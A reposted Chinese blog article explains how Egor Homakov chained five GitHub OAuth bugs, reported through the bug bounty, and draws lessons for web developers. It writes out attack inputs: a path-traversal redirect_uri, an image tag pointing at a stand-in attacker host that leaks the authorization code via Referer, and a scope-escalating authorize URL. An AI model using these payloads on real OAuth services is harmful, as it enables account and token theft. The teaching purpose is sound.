從“黑掉Github”學Web安全開發

Egor Homakov(Twitter: @homakov 個人網站: EgorHomakov.com)是一個Web安全的布道士,他這兩天把github給黑了,并給github報了5個安全方面的bug,他在他的這篇blog——《How I hacked Github again》(墻)說明了這5個安全bug以及他把github黑掉的思路。Egor的這篇文章講得比較簡單,很多地方一筆帶過,所以,我在這里用我的語言給大家闡述一下黑掉Github的思路以及原文中所提到的那5個bug。希望這篇文章能讓從事Web開發的同學們警惕。關于Web開發中的安全事項,大家可以看看這篇文章《Web開發中的你需要了解的東西

OAuth簡介

首先,這個故事要從Github OAuth講起。所以,我們需要先知道什么是OAuth。所謂OAuth就是說,第三方的應用可以通過你的授權而不用知道你的帳號密碼能夠訪問你在某網站的你自己的數據或功能。像Google, Facebook, Twitter等網站都提供了OAuth服務,提供OAuth服務的網站一般都有很多開放的API,第三方應用會調用這些API來開發他們的應用以讓用戶擁有更多的功能,但是,當用戶在使用這些第三方應用的時候,這些第三方的應用會來訪問用戶的帳戶內的功能和數據,所以,當第三應用要干這些事的時候,我們不能讓第三方應用彈出一個對話框來問用戶要他的帳號密碼,不然第三方的應用就把用戶的密碼給獲取了,所以,OAuth協議會跳轉到一個頁面,讓用戶授權給這個第三方應用以某些權限,然后,這個權限授權的記錄保存在Google/Facebook/Twitter上,并向第三方應用返回一個授權token,于是第三方的應用通過這個token來操作某用戶帳號的功能和數據時,就暢通無阻了。下圖簡單地說明了Twitter的OAuth的授權過程。

123.png

從上面的流程圖中,我們可以看OAuth不管是1.0還是2.0版本都是一個比較復雜的協議,所以,在Server端要把OAuth實現對并不是一些容易事,其總是或多或少會有些小錯誤。Egor就找到了幾個Github的OAuth的實現的問題。

OAuth的Callback

還需要注意的是,因為OAuth是需要跳到主站的網頁上去讓用戶授權,當用戶授權完后,需要跳轉回原網頁,所以,一般來說,OAuth授權頁都會帶一個 redirect_url的參數,用于指定跳轉回原來的網頁。Github使用的這個跳轉參數是redirect_uri參數。一般來說,redirect_uri這個參數需要在服務器端進行驗證。

你想一下,如果有人可以控制這個redirect_uri這個參數,那么,你就可以讓其跳轉到別的網頁上(可能會是個有惡意的網頁)。如果你覺得跳轉到別的網頁上也無所謂,那么你就錯了。別忘了,當你對這個第三方的應用授權通過后,服務方會給第三方應用返回一個授權token,這個token會被加到那個redirect_uri參數后面然后跳轉回去,如果這個redirect_uri被別有用心的人改一個惡意的網址后,這個token也就被轉過去了,于是授權token也就被泄漏過去了。

知道了這一切,我們就可以理解Egor提的那5個bug是什么意思了。

第一個Bug — 沒有檢查重定向URL中的/../

首先,我們通過Github的 redirect_uri 的說明文檔我們可以看到這樣的說明:

如果 CALLBACK URL是: http://example.com/path
GOOD: https://example.com/path
GOOD: http://example.com/path/subdir/other
BAD: http://example.com/bar
BAD: http://example.com/
BAD: http://example.com:8080/path
BAD: http://oauth.example.com:8080/path
BAD: http://example.org

而Github對于redirect_uri做了限制,要求只能跳回到 https://gist.github.com/auth/github/callback/,也就是說,域名是gist.github.com,目錄是/auth/github/callback/,服務器端做了這個限制,看似很安全了。

但是,Egor發現,Github的服務器端并沒有驗證.. /../../這樣的情況。

于是,Egor相當于構造了一個下面這樣的Redirect URL:

https://gist.github.com/auth/github/callback/../../../homakov/8820324?code=CODE

于是上面的URL就相當于:

https://gist.github.com/homakov/8820324?code=CODE

你可以看到,認證后的跳轉網頁轉到了別的地方去(并非是github限制的地方)——我們知道Github的gist雖然是給你分享代碼片段的,但是也可以用來定制自己的東西的(比如markdown),這個gist的網頁當然是被Egor所控制的。

第二個BUG — 沒有校驗token

第一個bug其實并沒有什么,如果服務器端要校驗一下token是否和之前生成的token的redirect_uri一模一樣,只要服務器做了這個驗證,第一個bug完全沒有什么用處,但是,github的服務端并沒有驗證。

這就是第二個bug,于是第一個和第二個bug組合起來成了一個相當有威力的安全漏洞。

也就是說,token的生成要考慮redirect_uri,這樣,當URL跳轉的時候,會把redirect_uri和token帶到跳轉頁面(這里的跳轉頁面還是github自己的),跳轉頁面的服務端程序要用redirect_uri來生成一個token,看看是不是和傳來的token是一個樣的。這就是所謂的對URL進行簽名——以保證URL的不被人篡改。一般來說,對URL簽名和對簽名驗證的因子包括,源IP,服務器時間截,session,或是再加個salt什么的。

第三個BUG — 注入跨站圖片

現在,redirect_uri帶著code,安全順利地跳到了Egor構造的網頁上:

https://gist.github.com/homakov/8820324?code=CODE

但是,這個是gist的網頁,你無法在這個頁面上運行前端(Javascript)或后端程序(Ruby——Github是Ruby做的),現在的問題是我們怎么得到那個code,因為那個code雖然后帶到了我的網頁上來,但那個網頁還是github和用戶自己的環境。

到這里,一般來說,黑客會在這個頁面上放一個諸如下面的一個鏈接,來引誘用戶點擊,:

<a href=http://hack.you.com/>私人照片</a>

這樣,當頁面跳轉到黑客的網站上來后,你之前的網頁上的網址會被加在http頭里的 Refere 參數里,這樣,我就可以得到你的token了。

但是,在gist上放個鏈接還要用戶去點一下,這個太影響“用戶體驗”了,最好能嵌入點外部的東西。gist上可以嵌入外站的圖片,但是github的開發人員并非等閑之輩,對于外站的圖片,其統統會把這些圖片的url代理成github自己的url,所以,你很難搞定。

不過,我們可以用一個很詭異的技巧:

<img src=”///attackersite.com”>

這個是什么玩意?這個是個URL的相對路徑。但是為什么會有三個///呢?呵呵。

像程序員一樣的思考

這個時候,我們需要以“程序員的編程思維”來思考問題——如果你是程序員,你會怎么寫校驗URL的程序?你一定會想到使用正則表達式,或是用程序來匹配URL中的一些pattern。于是,

  • 對于絕對路徑:你會匹配兩個//,后面的可能會是 user@host.com(user@是可選的),然后可能會有:<n>端口號,然后是/,后面是服務器的路徑,再往后面應該是?后面帶一些參數了。

  • 對于相對路徑:就沒有絕對路徑那么復雜了。就是些 .. 和 /再加上?和一些參數。

好了,如果coolshell.cn網頁中的<img src=>或<a href=>中用到的相對路徑是 /host.com,那么瀏覽器會解釋成:http://coolshell.cn/host.com,如果是///host.com,那么就應該被瀏覽器解釋成 http://coolshell.cn///host.com。

但是,Chrome和Firefox,會把///host.com當成絕對路徑,因為其正確匹配了絕對路徑的scheme。如果你正在用Chrome/Firefox看這篇文章 ,你可以看看下面的連接(源碼如下):

<a href="///www.google.com">CoolShell Test</a>

關鍵是,這個Chrome/Firefox的問題被標記成了Won’t Fix,我勒個去,基本上來說,后臺的程序也有可能有這樣的問題,對于Perl,Python,Ruby,Node.js,PHP帶的URL檢查的函數庫都有這樣的問題。

于是,我們就可以使用這樣的方式給gist注入了一個第三方站點的圖片(github的服務端沒有察覺到(因為我們前面說過大多數語言的URL檢查庫都會被 Bypass了),但是瀏覽器端把這個鏈接解釋到了第三方的站點上),于是請求這個圖片的http頭中的refere 中包含用戶當前頁面的URL,也包含了用戶授權的code。

到這里,黑客Egor已經拿到用戶gist的權限并可以修改或查看用戶私用的gist了。但是作者并沒有滿足,他想要的更多。

第四個bug – Gist把github_token放在了cookie里

于是Egor在用戶的cookie里找到了 github_token

從“黑掉Github”學Web安全開發

但是這個token沒什么用,因為授權的Scope只有gists。但是,這個token不應該放在用戶端的cookie里,本身就是一個安全事故,這個東西只能放在服務端(關于Web開發中的安全事項,可以看看這篇文章《Web開發中的你需要了解的東西》)。

于是,Egor只能另謀出路。

第五個Bug – 自動給gist授權

因為gist是github自家的,Egor所以估計github想做得簡單一點,當用戶訪問gist的時候,不會出彈出一個OAuth的頁面來讓用戶授權,不然,用戶就會很詫異,都是你們自家的東西,還要授權?所以,Egor猜測github應該是對gist做了自動授權,于是,Egor搞了這樣的一個URL(注意其中的 redirect_uri中的scope )

https://github.com/login/oauth/authorize?client_id=7e0a3cd836d3e544dbd9&redirect_uri=https%3A%2F%2Fgist.github.com%2Fauth%2Fgithub%2Fcallback/../../../homakov/8820324&response_type=code&scope=repo,gists,user,delete_repo,notifications

于是,這個redirect-uri不但幫黑客拿到了訪問gist的token,而且還把授權token的scope擴大到了用戶的代碼庫等其它權限。于是你就可以黑入用戶的私有代碼區了。

 其它 & 感想

于是,作者從 Github Security Bug Bounty 拿到了USD $4,000的獎勵!Egor一共花了從下午2點到6點一共4個小時找到了這些Bug,平均一小時1000美刀。Egor還很得瑟的說,如果Github請他做安全顧問,他只收一小時USD $400刀,這4個小時也就$1,600。呵呵。大家看看,這是多么有效率的賺錢方式。

下圖是Github上的賞金獵手的排行榜(https://bounty.github.com/index.html#leaderboard)你可以上去挨個看看他們找到的問題,你會發現好些安全問題都很小,有些只能說是不是很規范的問題,Github都賞了幾百刀。我查看了一下github的賞金政策,github賞金至少100刀,到5000刀不等。

123..jpg

讓我們捫心自問一下,我們花了多少時間在玩那些“紅包游戲”,而又搞到了多少紅包?人家4個小時找了5個bug,掙了$4000美金。老天給了你我一樣的時間,我們用來抽幾塊錢的紅包,人家用自己的技能來掙獎金。這就是人和人的差距。這就是所謂的效率——你可以移步看看我寫的《加班與效率

轉自:http://coolshell.cn/articles/11021.html

原創文章,作者:s19930811,如若轉載,請注明出處:http://www.www58058.com/2109

(0)
s19930811s19930811
上一篇 2016-08-15
下一篇 2016-08-15

相關推薦

  • for、while、until循環

    一、for循環         ? for 變量名 in 列表;do             循環體     &nbsp…

    Linux干貨 2016-09-19
  • 手動添加用戶

        通常使用useradd命令可以輕松添加一個用戶,然后使用passwd命令設置一個密碼后就可以登錄系統了,其實這一過程完成可以自己手動完成,下面就讓我們來通過修改配置文件來添加一個用戶。 一、修改/etc/passwd文件     在etc/passwd文件中手動添加一行內…

    Linux干貨 2015-04-27
  • Linux基礎命令與詳解(2017后續更新)

    后續陸續更新 命令基礎

    Linux干貨 2017-11-14
  • Shell腳本中循環淺析

    在shell腳本中,循環是很重要的一環。循環可以不斷的執行某個程序段落,直到用戶設置的條件達成為止。在shell中,除了這種依據判斷時達成與否的不定循環之外,還有另外一種已經固定要跑多少次的循環,可稱之為固定循環。下面,我們主要對for,while,until三種循環做一下介紹。   一、for循環 For循環是給定變量列表的固定次數循環,其執行機…

    Linux干貨 2016-08-21
  • N26-第四周-孫逸

    1、  復制/etc/skel目錄為/home/tuser1,要求/home/tuser1及其內部文件的屬組和其它用戶均沒有任何訪問權限。 cp –r /etc/skel /home/tuser1 chmod –R 700 /home/tuser1 2、  編輯/etc/group文件,添加組hadoop。 group文件的內容格式: &…

    2017-03-10
  • 第四周作業

    1、復制/etc/skel目錄為/home/tuser1,要求/home/tuser1及其內部文件的屬組和其它用戶均沒有任何訪問權限。  cp -rf /etc/skel/  /home/ mv /home/skel /home/tuser1 chmod  -R 700 /home/tuser1 或chmod -R  …

    Linux干貨 2016-12-03
欧美性久久久久